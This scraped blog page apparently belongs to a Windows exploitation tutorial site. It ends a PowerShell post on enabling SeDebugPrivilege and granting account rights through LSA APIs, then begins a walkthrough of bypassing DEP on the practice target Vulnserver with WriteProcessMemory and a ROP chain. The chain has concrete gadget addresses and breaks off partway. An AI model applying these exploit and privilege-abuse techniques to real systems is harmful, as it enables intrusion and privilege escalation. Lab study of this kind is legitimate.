class="line"> <span class="comment"># Enable SeDebugPrivilege for the current process</span></span><br><span 
class="line"> echo <span class="string">"[>] Calling Advapi32::AdjustTokenPrivileges`n"</span></span><br><span class="line"> <span class="variable">$CallResult</span> = [<span class="type">Advapi32</span>]::AdjustTokenPrivileges(<span class="variable">$hTokenHandle</span>, <span class="variable">$False</span>, [<span class="type">ref</span>]<span class="variable">$TokPriv1Luid</span>, <span class="number">0</span>, [<span class="built_in">Int</span><span class="type">Ptr</span>]::Zero, [<span class="built_in">Int</span><span class="type">Ptr</span>]::Zero)</span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$CallResult</span>) {</span><br><span class="line"> <span class="variable">$LastError</span> = [<span class="type">Kernel32</span>]::GetLastError()</span><br><span class="line"> echo <span class="string">"[!] Mmm, something went wrong! GetLastError returned: <span class="variable">$LastError</span>`n"</span></span><br><span class="line"> <span class="keyword">Return</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> echo <span class="string">"[?] 
SeDebugPrivilege is enabled!`n"</span></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">Add-Type</span> <span class="literal">-TypeDefinition</span> <span class="string">@'</span></span><br><span class="line"><span class="string">using System;</span></span><br><span class="line"><span class="string">using System.Text;</span></span><br><span class="line"><span class="string">using System.Security.Principal;</span></span><br><span class="line"><span class="string">using System.Runtime.InteropServices;</span></span><br><span class="line"><span class="string">using System.ComponentModel;</span></span><br><span class="line"><span class="string">[StructLayout(LayoutKind.Sequential, Pack = 1)]</span></span><br><span class="line"><span class="string">public struct TokPriv1Luid</span></span><br><span class="line"><span class="string">{</span></span><br><span class="line"><span class="string"> public int Count;</span></span><br><span class="line"><span class="string"> public long Luid;</span></span><br><span class="line"><span class="string"> public int Attr;</span></span><br><span class="line"><span class="string">}</span></span><br><span class="line"><span class="string">public static class Advapi32</span></span><br><span class="line"><span class="string">{</span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public static extern bool OpenProcessToken(</span></span><br><span class="line"><span class="string"> IntPtr ProcessHandle, </span></span><br><span class="line"><span class="string"> int DesiredAccess,</span></span><br><span class="line"><span class="string"> ref IntPtr TokenHandle);</span></span><br><span class="line"><span class="string"> </span></span><br><span 
class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public static extern bool LookupPrivilegeValue(</span></span><br><span class="line"><span class="string"> string lpSystemName,</span></span><br><span class="line"><span class="string"> string lpName,</span></span><br><span class="line"><span class="string"> ref long lpLuid);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError = true)]</span></span><br><span class="line"><span class="string"> public static extern bool AdjustTokenPrivileges(</span></span><br><span class="line"><span class="string"> IntPtr TokenHandle,</span></span><br><span class="line"><span class="string"> bool DisableAllPrivileges,</span></span><br><span class="line"><span class="string"> ref TokPriv1Luid NewState,</span></span><br><span class="line"><span class="string"> int BufferLength,</span></span><br><span class="line"><span class="string"> IntPtr PreviousState,</span></span><br><span class="line"><span class="string"> IntPtr ReturnLength);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public extern static bool DuplicateToken(</span></span><br><span class="line"><span class="string"> IntPtr ExistingTokenHandle,</span></span><br><span class="line"><span class="string"> int SECURITY_IMPERSONATION_LEVEL,</span></span><br><span class="line"><span class="string"> ref IntPtr DuplicateTokenHandle);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public static extern bool SetThreadToken(</span></span><br><span 
class="line"><span class="string"> IntPtr Thread,</span></span><br><span class="line"><span class="string"> IntPtr Token);</span></span><br><span class="line"><span class="string">}</span></span><br><span class="line"><span class="string">public static class LSAWrapper</span></span><br><span class="line"><span class="string">{</span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", PreserveSig = true)]</span></span><br><span class="line"><span class="string"> private static extern UInt32 LsaOpenPolicy(</span></span><br><span class="line"><span class="string"> ref LSA_UNICODE_STRING SystemName,</span></span><br><span class="line"><span class="string"> ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,</span></span><br><span class="line"><span class="string"> Int32 DesiredAccess,</span></span><br><span class="line"><span class="string"> out IntPtr PolicyHandle</span></span><br><span class="line"><span class="string"> );</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]</span></span><br><span class="line"><span class="string"> private static extern long LsaAddAccountRights(</span></span><br><span class="line"><span class="string"> IntPtr PolicyHandle,</span></span><br><span class="line"><span class="string"> IntPtr AccountSid,</span></span><br><span class="line"><span class="string"> LSA_UNICODE_STRING[] UserRights,</span></span><br><span class="line"><span class="string"> long CountOfRights);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll")]</span></span><br><span class="line"><span class="string"> private static extern long LsaClose(IntPtr objectHandle);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("kernel32.dll")]</span></span><br><span 
class="line"><span class="string"> private static extern int GetLastError();</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll")]</span></span><br><span class="line"><span class="string"> private static extern long LsaNtStatusToWinError(long status);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [StructLayout(LayoutKind.Sequential)]</span></span><br><span class="line"><span class="string"> private struct LSA_OBJECT_ATTRIBUTES</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> public int Length;</span></span><br><span class="line"><span class="string"> public IntPtr RootDirectory;</span></span><br><span class="line"><span class="string"> public readonly LSA_UNICODE_STRING ObjectName;</span></span><br><span class="line"><span class="string"> public UInt32 Attributes;</span></span><br><span class="line"><span class="string"> public IntPtr SecurityDescriptor;</span></span><br><span class="line"><span class="string"> public IntPtr SecurityQualityOfService;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [StructLayout(LayoutKind.Sequential)]</span></span><br><span class="line"><span class="string"> private struct LSA_UNICODE_STRING</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> public UInt16 Length;</span></span><br><span class="line"><span class="string"> public UInt16 MaximumLength;</span></span><br><span class="line"><span class="string"> public IntPtr Buffer;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> 
[Flags]</span></span><br><span class="line"><span class="string"> private enum LSA_AccessPolicy : long</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,</span></span><br><span class="line"><span class="string"> POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,</span></span><br><span class="line"><span class="string"> POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,</span></span><br><span class="line"><span class="string"> POLICY_TRUST_ADMIN = 0x00000008L,</span></span><br><span class="line"><span class="string"> POLICY_CREATE_ACCOUNT = 0x00000010L,</span></span><br><span class="line"><span class="string"> POLICY_CREATE_SECRET = 0x00000020L,</span></span><br><span class="line"><span class="string"> POLICY_CREATE_PRIVILEGE = 0x00000040L,</span></span><br><span class="line"><span class="string"> POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,</span></span><br><span class="line"><span class="string"> POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,</span></span><br><span class="line"><span class="string"> POLICY_AUDIT_LOG_ADMIN = 0x00000200L,</span></span><br><span class="line"><span class="string"> POLICY_SERVER_ADMIN = 0x00000400L,</span></span><br><span class="line"><span class="string"> POLICY_LOOKUP_NAMES = 0x00000800L,</span></span><br><span class="line"><span class="string"> POLICY_NOTIFICATION = 0x00001000L</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> //POLICY_ALL_ACCESS mask <http://msdn.microsoft.com/en-us/library/windows/desktop/ms721916%28v=vs.85%29.aspx></span></span><br><span class="line"><span class="string"> private const int POLICY_ALL_ACCESS = (int)(</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_AUDIT_LOG_ADMIN |</span></span><br><span class="line"><span class="string"> 
LSA_AccessPolicy.POLICY_CREATE_ACCOUNT |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_CREATE_PRIVILEGE |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_CREATE_SECRET |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_GET_PRIVATE_INFORMATION |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_LOOKUP_NAMES |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_NOTIFICATION |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_SERVER_ADMIN |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_SET_AUDIT_REQUIREMENTS |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_SET_DEFAULT_QUOTA_LIMITS |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_TRUST_ADMIN |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_VIEW_AUDIT_INFORMATION |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_VIEW_LOCAL_INFORMATION</span></span><br><span class="line"><span class="string"> );</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> public static void SetRight(string accountName, string privilegeName)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //Convert assigned privilege to LSA_UNICODE_STRING[] object</span></span><br><span class="line"><span class="string"> var userRights = GetUserRightsObject(privilegeName);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> //Get account SID and pin object for P/Invoke</span></span><br><span class="line"><span class="string"> var sid = GetBinarySID(accountName);</span></span><br><span class="line"><span 
class="string"> var handle = GCHandle.Alloc(sid, GCHandleType.Pinned);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> //Open LSA policy</span></span><br><span class="line"><span class="string"> IntPtr policyHandle = OpenPolicyHandle();</span></span><br><span class="line"><span class="string"> try</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //add the right to the account</span></span><br><span class="line"><span class="string"> long status = LsaAddAccountRights(policyHandle, handle.AddrOfPinnedObject(), userRights, userRights.Length);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> var winErrorCode = LsaNtStatusToWinError(status);</span></span><br><span class="line"><span class="string"> if (winErrorCode != 0)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> throw new Win32Exception((int)winErrorCode, "LsaAddAccountRights failed");</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> finally</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> handle.Free();</span></span><br><span class="line"><span class="string"> Marshal.FreeHGlobal(userRights[0].Buffer); //Can use LsaFreeMemory instead?</span></span><br><span class="line"><span class="string"> LsaClose(policyHandle); </span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> private static LSA_UNICODE_STRING[] GetUserRightsObject(string privilegeName)</span></span><br><span 
class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //initialize userRights objects</span></span><br><span class="line"><span class="string"> return new[]</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> new LSA_UNICODE_STRING</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> Buffer = Marshal.StringToHGlobalUni(privilegeName),</span></span><br><span class="line"><span class="string"> Length = (UInt16)(privilegeName.Length * UnicodeEncoding.CharSize),</span></span><br><span class="line"><span class="string"> MaximumLength = (UInt16)((privilegeName.Length + 1) * UnicodeEncoding.CharSize)</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> };</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> private static byte[] GetBinarySID(string accountName)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //Get account SID</span></span><br><span class="line"><span class="string"> NTAccount account;</span></span><br><span class="line"><span class="string"> try</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> account = new NTAccount(accountName);</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> catch(IdentityNotMappedException)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> throw; //TODO:ErrorHandling</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span 
class="line"><span class="string"> //Convert SID to byte[]</span></span><br><span class="line"><span class="string"> var identity = (SecurityIdentifier)account.Translate(typeof(SecurityIdentifier));</span></span><br><span class="line"><span class="string"> var buffer = new byte[identity.BinaryLength];</span></span><br><span class="line"><span class="string"> identity.GetBinaryForm(buffer, 0);</span></span><br><span class="line"><span class="string"> return buffer;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> private static IntPtr OpenPolicyHandle()</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //dummy variables</span></span><br><span class="line"><span class="string"> var systemName = new LSA_UNICODE_STRING();</span></span><br><span class="line"><span class="string"> var objectAttributes = new LSA_OBJECT_ATTRIBUTES</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> Length = 0,</span></span><br><span class="line"><span class="string"> RootDirectory = IntPtr.Zero,</span></span><br><span class="line"><span class="string"> Attributes = 0,</span></span><br><span class="line"><span class="string"> SecurityDescriptor = IntPtr.Zero,</span></span><br><span class="line"><span class="string"> SecurityQualityOfService = IntPtr.Zero</span></span><br><span class="line"><span class="string"> };</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> IntPtr policyHandle;</span></span><br><span class="line"><span class="string"> uint status = LsaOpenPolicy(ref systemName, ref objectAttributes, POLICY_ALL_ACCESS, out policyHandle);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> var 
winErrorCode = LsaNtStatusToWinError(status);</span></span><br><span class="line"><span class="string"> if (winErrorCode != 0)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> throw new Win32Exception((int)winErrorCode, "LsaOpenPolicy failed");</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> return policyHandle;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string">}</span></span><br><span class="line"><span class="string">'@</span></span><br><span class="line"></span><br><span class="line">Main</span><br></pre></td></tr></table></figure>
<p>参考:</p>
<p>1.<a href="https://blog.csdn.net/singleyellow/article/details/93394557" target="_blank" rel="noopener">https://blog.csdn.net/singleyellow/article/details/93394557</a></p>
<p>2.<a href="https://www.powershellgallery.com/packages/PoshPrivilege/0.1.1.0/Content/Scripts%5CAdd-Privilege.ps1" target="_blank" rel="noopener">https://www.powershellgallery.com/packages/PoshPrivilege/0.1.1.0/Content/Scripts%5CAdd-Privilege.ps1</a></p>
<p>3.<a href="https://github.com/cloudbase/unattended-setup-scripts/blob/master/ServiceUserManagement.ps1" target="_blank" rel="noopener">https://github.com/cloudbase/unattended-setup-scripts/blob/master/ServiceUserManagement.ps1</a></p>
<p>4.<a href="https://gist.github.com/nijave/9174d5af9378a0c4ef1498795f1ead0d" target="_blank" rel="noopener">https://gist.github.com/nijave/9174d5af9378a0c4ef1498795f1ead0d</a></p>
<p>5.<a href="https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e" target="_blank" rel="noopener">https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e</a></p>
<p>6.<a href="https://gist.github.com/altrive/9151365" target="_blank" rel="noopener">https://gist.github.com/altrive/9151365</a></p>
<p>7.<a href="https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1" target="_blank" rel="noopener">https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/" class="post-title-link" itemprop="url">Vulnserver TRUN Bypass DEP With ROP On Win10 II</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-30 10:56:22" itemprop="dateCreated datePublished" datetime="2022-05-30T10:56:22Z">2022-05-30</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-10-08 13:47:07" itemprop="dateModified" datetime="2022-10-08T13:47:07Z">2022-10-08</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>这次,用<code>WriteProcessMemory</code>来<code>Bypass DEP</code>,看一下<code>WriteProcessMemory</code>的函数原型:</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL <span class="title">WriteProcessMemory</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] HANDLE hProcess,</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] LPVOID lpBaseAddress,</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] LPCVOID lpBuffer,</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] SIZE_T nSize,</span></span></span><br><span class="line"><span class="function"><span class="params"> [out] SIZE_T *lpNumberOfBytesWritten</span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span>;</span><br></pre></td></tr></table></figure>
<p><code>hProcess:</code>要修改的进程内存的句柄。句柄必须具有对进程的 <code>PROCESS_VM_WRITE</code> 和 <code>PROCESS_VM_OPERATION</code> 访问权限。</p>
<p><code>lpBaseAddress:</code>指向要写入数据的指定进程中的基地址的指针。在数据传输发生之前,系统会验证指定大小的基地址和内存中的所有数据都可以进行写访问,如果不可访问,则函数失败。</p>
<p><code>lpBuffer:</code>指向缓冲区的指针,该缓冲区包含要写入指定进程地址空间的数据。</p>
<p><code>nSize:</code>要写入指定进程的字节数。</p>
<p><code>lpNumberOfBytesWritten:</code>指向变量的指针,该变量接收传输到指定进程的字节数。此参数是可选的。如果 <code>lpNumberOfBytesWritten</code> 为<code>NULL</code>,则忽略该参数。</p>
<p>根据函数各参数的说明,在<code>Bypass DEP</code>的时候,各参数的设置情况:</p>
<p><code>hProcess:</code>提供一个伪句柄,指定为特定的常量<code>-1</code>,当<code>WriteProcessMemory API</code>被调用的时候,它会将<code>-1</code>转换为实际进程句柄,也就意味着这个参数我们设置的时候可以忽略。</p>
<p><code>lpBaseAddress:</code>这个参数我们可以设置为一个绝对地址,其指向我们将要写入模块的代码段,为了不引起程序崩溃,可以指向代码段中未使用的区域。这里有个技巧,因为代码段在编译的时候需要对齐,所以选择在代码段上限的尾部即可,因为这里填充的一定是<code>null</code>字符。</p>
<p>在<code>windbg</code>中看一眼:</p>
<p>这里可以使用的是<code>essfunc.dll</code>。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/01.png" alt="BOF"></p>
<p>依据<code>PE</code>相关知识,获取代码段地址的步骤:</p>
<p><code>DOS Header + 0x3c</code>指向<code>PE Header</code>:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/02.png" alt="BOF"></p>
<p><code>PE Header + 0x2c</code>指向代码段:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/03.png" alt="BOF"></p>
<p>来获取<code>essfunc.dll</code>的代码段地址:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/04.png" alt="BOF"></p>
<p>获取的代码段地址为<code>62501000</code>,看一下对应的内存属性:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/05.png" alt="BOF"></p>
<p>定位到代码段某一地址(这里<code>62501c00</code> ,后续考虑地址不包含<code>00</code>字符,选择<code>62501c10</code>作为<code>lpBaseAddress</code>的值):</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/06.png" alt="BOF"></p>
<p><code>lpBuffer:</code>保存<code>shellcode</code>所在地址,这个地址需要到执行栈溢出之后,才能确定。</p>
<p><code>nSize:shellcode</code>的大小。几乎所有<code>metasploit</code>产生的<code>shellcode</code>大小都是小于<code>500bytes</code>,所以我们可以指定任意值,这里用<code>-524(0xfffffdf4)</code>代替,然后取反即可。换做<code>ROP Gadget</code>就是先把<code>0xfffffdf4</code>存入某个寄存器,如<code>EAX</code>,然后<code>NEG EAX</code>即可。</p>
<p><code>lpNumberOfBytesWritten:</code>指向一个可写的<code>DWORD</code>空间,用于保存<code>WriteProcessMemory</code>复制的<code>byte</code>数目。比较简单的方法是将其保存到<code>essfunc.dll</code>的数据段里面,来看一下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0:001> !dh -a essfunc</span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/07.png" alt="BOF"></p>
<p>确认数据段里面的空间没有被使用:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/08.png" alt="BOF"></p>
<p>段需要对齐,可以查看<code>section alignment</code>的对齐为<code>1000</code>:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/09.png" alt="BOF"></p>
<p>前面<code>2000+24</code>的值不为<code>1000</code>的整数倍,所以后续会补<code>00</code>,直到它为<code>1000</code>的整数倍为止。我们在取值的时候<code>+4</code>正好可以落在为了补齐增加的<code>00</code>空间里,不需要刻意到前面去查找。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/10.png" alt="BOF"></p>
<p>接下来,就是在<code>essfunc.dll</code>的<code>IAT</code>中找是否存在<code>WriteProcessMemory</code>,利用<code>!dh essfunc.dll -f</code>查看<code>IAT</code>地址和偏移时发现都是空,有点诡异。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/11.png" alt="BOF"></p>
<p>在<code>windbg</code>用命令<code>dps essfunc L2000</code>查看,找到一些信息:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/12.png" alt="BOF"></p>
<p>借用之前文章<a href="https://n0maj1o24.github.io/2022/05/28/Sync-Breeze-10-0-28-bypass-DEP/">《Sync Breeze 10.0.28 bypass DEP》</a>的方法获取<code>WriteProcessMemory</code>的地址,这里就不过多介绍了,国际友人那个脚本会出问题,还是得手动来:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/13.png" alt="BOF"></p>
<p>根据以上信息,<code>WriteProcessMemory</code>函数的部分参数是可以提前确定的:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">func = struct.pack(<span class="string">"<L"</span>,<span class="number">0x45454545</span>) <span class="comment"># WriteProcessMemory Address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Shellcode Return Address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0xFFFFFFFF</span>) <span class="comment"># pseudo Process handle</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Code cave address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy lpBuffer (Stack address) </span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy nSize</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62502028</span>) <span class="comment"># lpNumberOfBytesWritten</span></span><br></pre></td></tr></table></figure>
<p>现在真正需要在运行时确定的只有三个值:<code>WriteProcessMemory</code>的函数地址、shellcode 在栈上的地址(<code>lpBuffer</code>)以及 shellcode 的大小(<code>nSize</code>),它们都由后面的 ROP Chain 动态计算后写回栈上对应的参数位置。</p>
<p>确定 shellcode 的栈地址时,这里采用的做法是在 ROP Chain 之后主动预留一段固定大小的栈空间,只要 ROP Gadgets 的总长度不超过这段空间,shellcode 的起始地址就固定为这段空间的末尾,把 shellcode 紧接在其后即可,无需再单独计算。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">rop1 = struct.pack(<span class="string">"<L"</span>, <span class="number">0x755912d6</span>) <span class="comment"># PUSH ESP # POP ESI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x755b671f</span>) <span class="comment"># MOV EDX,ESI # POP ESI # RETN 0x04 </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7728bdf4</span>) <span class="comment"># MOV EAX,EDX # POP ESI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span 
class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777878</span>) <span class="comment"># 0x77777878</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 